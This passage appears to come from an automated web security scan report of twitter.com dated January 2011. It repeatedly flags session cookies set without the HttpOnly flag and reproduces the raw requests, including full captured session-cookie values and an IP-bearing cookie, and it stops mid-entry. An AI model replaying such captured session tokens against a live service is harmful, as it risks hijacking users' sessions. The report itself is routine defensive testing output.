_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jordanknight HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.110. http://twitter.com/kennychesney previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/kennychesney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kennychesney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.111. http://twitter.com/kfaulk33 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/kfaulk33

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kfaulk33 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.112. http://twitter.com/lapubell previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/lapubell

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lapubell HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.113. http://twitter.com/lapubell/status/28131682842312704 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/lapubell/status/28131682842312704

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjlodHRwOi8vdHdpdHRlci5jb20vbGFwdWJlbGwv%250Ac3RhdHVzLzI4MTMxNjgyODQyMzEyNzA0Ogxjc3JmX2lkIiViYzI0ZWFiYzYx%250AZjk3NTNkYjBiMDU5MDZiZWFkZTZkNDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMw%250AYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07w%250AzC0B--73b1d4476b98de5154e4e6006eaf9f2cc116e66c; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lapubell/status/28131682842312704 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.114. http://twitter.com/lindapizzuti previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/lindapizzuti

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7DDoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbGluZGFwaXp6%250AdXRpOgx0el9uYW1lIhRDZW50cmFsIEFtZXJpY2E6DGNzcmZfaWQiJWFiYzQ1%250ANWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOhVpbl9uZXdfdXNlcl9mbG93%250AMDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--178659bc16aec601c68a4ccb180ddd6c5bcd3dc3; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lindapizzuti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 404 Not Found
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296266005-54049-23523
Last-Modified: Sat, 29 Jan 2011 01:53:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiRodHRwOi8vdHdpdHRlci5jb20vbGluZGFwaXp6%250AdXRpOgx0el9uYW1lIhRDZW50cmFsIEFtZXJpY2E6DGNzcmZfaWQiJWFiYzQ1%250ANWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOhVpbl9uZXdfdXNlcl9mbG93%250AMDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFz%250AaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpA%250AdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--178659bc16aec601c68a4ccb180ddd6c5bcd3dc3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.115. http://twitter.com/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.116. http://twitter.com/malsup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /malsup HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://malsup.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1295994766153789

Response

11.117. http://twitter.com/malsup/favorites previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/favorites

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/favorites HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.118. http://twitter.com/malsup/followers previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/followers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2VyczoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--4024847b7caa44727b74ae89efd07cb29e96d23b; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/followers HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:28:28 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers
X-Runtime: 0.00329
Content-Type: text/html; charset=utf-8
Content-Length: 133
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2VyczoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--4024847b7caa44727b74ae89efd07cb29e96d23b; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:33:25 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowers">redirected</a>.</body></html>

11.119. http://twitter.com/malsup/following previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/following

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2luZzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--148959b3be71f317b0f559b6a54c3a0c718e618f; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/following HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:28:26 GMT
Server: hi
Status: 302 Found
Location: http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing
X-Runtime: 0.00243
Content-Type: text/html; charset=utf-8
Content-Length: 133
Cache-Control: no-cache, max-age=300
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIihodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL2Zv%250AbGxvd2luZzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0%250AIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNo%250AewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--148959b3be71f317b0f559b6a54c3a0c718e618f; domain=.twitter.com; path=/
Expires: Fri, 28 Jan 2011 14:33:24 GMT
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fmalsup%2Ffollowing">redirected</a>.</body></html>

11.120. http://twitter.com/malsup/lists/memberships previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/lists/memberships

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlOTY3NDUzZWYzNmZkNjRmZmZhNWVmMDJlMjczNTIz%250AYWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d2b7d333c4ae3616cea1972ad8fcfbf90f4504; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/lists/memberships HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.121. http://twitter.com/malsup/status/28104072506638336 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28104072506638336

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODEwNDA3MjUwNjYzODMzNjoMY3NyZl9pZCIlNWNkZDU3ZjRlMjQy%250AN2Q4MTA4MmM0NDFhZDg5MjY2YzI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--e0b142d583ea9a31999ba97ee4a16fb9f6b484a2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28104072506638336 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.122. http://twitter.com/malsup/status/28148269980852225 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28148269980852225

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8yODE0ODI2OTk4MDg1MjIyNToMY3NyZl9pZCIlMjhjNDM2MTNkMDIw%250ANDA2NjMwMjM2MDE1YmViMWNhOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--53ddf4f09f23d5fa1c2283d7064ce993e37290a9; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /malsup/status/28148269980852225 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.123. http://twitter.com/malsup/status/28172705220009984 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/malsup/status/28172705220009984

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

